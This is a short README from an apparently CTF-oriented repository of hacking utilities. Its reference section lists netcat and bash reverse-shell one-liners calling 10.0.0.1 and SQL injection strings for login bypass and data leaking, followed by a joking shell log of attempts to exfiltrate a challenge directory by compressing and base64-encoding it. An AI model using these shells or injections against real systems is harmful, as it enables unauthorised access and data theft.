blob: 7a3eac4c0fe8f11d8d318fcc7e3bb24da91c78be (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
Library of GNU Exploitation
===========================
This is a collection of unix-like utilities particularly suited
for creative problem solving (H A C K I N G).
Wishlist
--------
* Docs on hydra?
* Docs on sqlmap?
* Build of stegsolve (Java program)
Reference
---------
nc 10.0.0.1 1234 -e /bin/sh # Netcat reverse shell (Linux)
nc 10.0.0.1 1234 -e cmd.exe # Netcat reverse shell (Windows)
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash reverse shell
' OR 1=1-- # SQL inject (pass)
' OR 1=1 UNION SELECT x,y,z FROM table-- # SQL inject (leak)
**How not to exfil a directory**
$ zip challenge/
$ gzip challenge
$ ls
$ ls challenge
$ rm challenge.gz
$ man gzip
$ exit
**Log Back In**
$ gzip -k challenge
$ ls
$ base64 challenge.gz
$ exit
**Log Back In**
$ rm challenge.gz
$ tar -czf challenge
$ ls
$ tar -czf challenge.tar.gz challenge
$ ls
$ base64 challenge.tar.gz
$ exit
|
